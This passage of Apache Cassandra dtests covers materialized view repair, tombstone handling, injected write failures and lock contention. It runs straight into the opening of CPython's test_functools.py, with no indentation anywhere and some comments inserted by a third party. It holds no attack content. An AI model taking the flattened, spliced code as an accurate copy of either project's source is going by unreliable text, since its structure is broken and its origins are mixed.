"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in range(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
logger.debug('Verify the data in the MV on node1 with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Close connection to node1')
session.cluster.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in range(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in range(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
logger.debug('Verify the new data in the MV on node2 with CL=ONE')
for i in range(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
logger.debug('Read data from MV at QUORUM (old data should be returned)')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
logger.debug('Read data from MV at quorum (new data should be returned after repair)')
for i in range(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
@pytest.mark.resource_intensive
def test_throttled_partition_update(self):
"""
        @jira_ticket CASSANDRA-13299
        Test breaking up a large partition when repairing the base table of an MV. A configurable
        batch size (cassandra.repair.mutation_repair_rows_per_batch, set per node below) throttles
        the number of rows applied in one mutation.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
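# Illustrative note (not part of the original test): the throttle is applied per node through the
# JVM property passed at startup further down, e.g.
#   node.start(jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch=2"])
# With the 50x50-row partition built below (2500 rows), a batch size of 2 would split a repair
# mutation into roughly 1250 pieces, while a batch size of 5000 applies it as a single mutation.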
node1, node2, node3, node4, node5 = self.cluster.nodelist()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
"PRIMARY KEY (pk, ck2, ck1)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
size = 50
range_deletion_ts = 30
partition_deletion_ts = 10
for ck1 in range(size):
for ck2 in range(size):
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
self._replay_batchlogs()
for ck1 in range(size):
for ck2 in range(size):
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
logger.debug('Shutdown node4 and node5')
node4.stop(wait_other_notice=True)
node5.stop(wait_other_notice=True)
for ck1 in range(size):
for ck2 in range(size):
if ck1 % 2 == 0: # range tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
elif ck1 == ck2: # row tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
# range deletion
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))
# partition deletion for ck1 <= partition_deletion_ts
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
# only partition deletion for the pk=2000
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
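# Note on timestamps (added for clarity): rows are written USING TIMESTAMP ck1 (0..49), so the
# partition deletion at timestamp 10 shadows every row with ck1 <= 10, and the range deletion at
# timestamp 30 shadows 20 < ck1 < 30 as well as (ck1 == 20, ck2 < 10). The row and cell tombstones
# use timestamps 60 and 70, which are newer than all writes. This is what the per-node
# verification loop below asserts.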
self._replay_batchlogs()
# start nodes with different batch size
logger.debug('Starting nodes')
node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
self._replay_batchlogs()
logger.debug('repairing base table')
node1.nodetool("repair ks t")
# insert data into the deleted partition with pk=2000; it should be considered dead
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
self._replay_batchlogs()
logger.debug('stop cluster')
self.cluster.stop()
logger.debug('rolling restart to check repaired data on each node')
for node in self.cluster.nodelist():
logger.debug('starting {}'.format(node.name))
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
for ck1 in range(size):
for ck2 in range(size):
if (
ck1 <= partition_deletion_ts or # partition deletion
ck1 == ck2 or ck1 % 2 == 0 or # row deletion or range tombstone
(ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10) # range tombstone
):
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
else:
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
# Verify partition deletion with pk=2000 has no live data
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
logger.debug('stopping {}'.format(node.name))
node.stop(wait_other_notice=True, wait_for_binary_proto=True)
@pytest.mark.resource_intensive
def test_really_complex_repair(self):
"""
Test that a materialized view is consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=1 so batchlog will expire after 1 second
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
logger.debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
logger.debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
# at this point the data isn't repaired so we have an inconsistency:
# the old 'a' rows are still returned at QUORUM; only after the repair below should this query return no rows
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
logger.debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
logger.debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new rows that do not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update rows that do not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete rows that do not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
def propagate_view_creation_over_non_existing_table(self):
"""
The internal addition of a view over a non-existing table should be ignored
@jira_ticket CASSANDRA-13737
"""
cluster = self.cluster
cluster.populate(3)
cluster.start()
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
create_ks(session, 'ks', 3)
session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')
# create a materialized view only in nodes 1 and 2
node3.stop(wait_other_notice=True)
session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
'PRIMARY KEY (state, username)'))
# drop the base table only in node 3
node1.stop(wait_other_notice=True)
node2.stop(wait_other_notice=True)
node3.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
session.execute('DROP TABLE ks.users')
# restart the cluster
cluster.stop()
cluster.start()
# node3 should have received and ignored the creation of the MV over the dropped table
assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
self._test_base_view_consistency_on_crash("after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
self._test_base_view_consistency_on_crash("before")
def _test_base_view_consistency_on_crash(self, fail_phase):
"""
* Fails base table write before or after applying views
* Restart node and replay commitlog and batchlog
* Check that base and views are present
@jira_ticket CASSANDRA-13069
"""
self.cluster.set_batch_commitlog(enabled=True)
self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
self.prepare(rf=1, install_byteman=True)
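# Note (added for clarity): fail_phase is "before" or "after", selecting the byteman rule
# ./byteman/fail_before_view_write.btm or ./byteman/fail_after_view_write.btm submitted below.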
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Make node1 fail {} view writes'.format(fail_phase))
node1.byteman_submit(['./byteman/fail_{}_view_write.btm'.format(fail_phase)])
logger.debug('Write 1000 rows - all node1 writes should fail')
failed = False
for i in range(1, 1000):
try:
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
except WriteFailure:
failed = True
assert failed, "Should fail at least once."
assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"
missing_entries = 0
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
if not base_entry:
missing_entries += 1
if not view_entry:
missing_entries += 1
logger.debug("Missing entries {}".format(missing_entries))
assert missing_entries > 0
logger.debug('Restarting node1 to ensure commit log is replayed')
node1.stop(wait_other_notice=True)
# Set batchlog.replay_timeout_in_ms=1 so we can ensure the batchlog will be replayed below
node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) // num_partitions, c=i, d=i)
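# Worked example (added for clarity): with num_partitions=5, row_generate(12, 5) returns
# SimpleRow(a=2, b=2, c=12, d=12), i.e. index 12 lands in base partition (a=2, b=2).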
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
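# Worked example (added for clarity): with num_partitions=5, i=7 maps to (a=2, b=1, c=7). A later
# index such as 407 maps to the same (a, b), so if the base read recorded c=407, an absent view row
# for c=7 is classified as Excluded(), while a still-present view row for c=7 becomes Extra(407, 7, ...).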
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print(str(e))
queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
logger.debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in list(self.exception_type.keys()):
output = "{} ({}: {})".format(output, key, self.exception_type[key])
logger.debug(output)
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unknown])
)
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print(traceback.format_exception_only(type(e), e))
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async_ret = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async_ret.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
@pytest.mark.skip(reason='awaiting CASSANDRA-11290')
def test_single_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def test_multi_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(5)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
node1, node2, node3 = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) // processes
logger.debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
logger.debug("Writing data to base table")
for i in range(upper // 10):
self._do_row(insert1, i, num_partitions)
logger.debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug("Writing more data to base table")
for i in range(upper // 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
logger.debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
logger.debug("Finished writes, now verifying reads")
self._populate_rows()
threads = []
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = get_ip_from_node(node2)
t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
threads.append(t)
t.daemon = True
t.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
try:
mm = queues[i % processes].get(timeout=60)
except Empty as e:
pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
if not mm.out() is None:
logger.debug("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
for thread in threads:
thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
"""
Test materialized views lock contention.
@jira_ticket CASSANDRA-12689
@since 3.0
"""
def _prepare_cluster(self):
self.cluster.populate(1)
self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
self.protocol_version = 5 if self.supports_v5_protocol else 4
self.cluster.set_configuration_options(values={
'concurrent_materialized_view_writes': 1,
'concurrent_writes': 1,
})
self.nodes = list(self.cluster.nodes.values())
for node in self.nodes:
remove_perf_disable_shared_mem(node)
self.cluster.start(jvm_args=[
"-Dcassandra.test.fail_mv_locks_count=64"
])
session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)
keyspace = "locktest"
session.execute("""
CREATE KEYSPACE IF NOT EXISTS {}
WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
""".format(keyspace))
session.set_keyspace(keyspace)
session.execute(
"CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
SELECT int1, date, int2
FROM test
WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
PRIMARY KEY (int1, date, int2)
WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")
return session
@since('3.0')
def test_mutations_dontblock(self):
session = self._prepare_cluster()
records = 100
records2 = 100
params = []
for x in range(records):
for y in range(records2):
params.append([x, y])
execute_concurrent_with_args(
session,
session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
params
)
assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])
for node in self.nodes:
with JolokiaAgent(node) as jmx:
mutationStagePending = jmx.read_attribute(
make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
)
assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
test_functools.py
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
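# py_functools is the pure-Python implementation (the _functools accelerator is blocked), while
# c_functools and decimal are re-imported with their C extension modules loaded fresh, so the test
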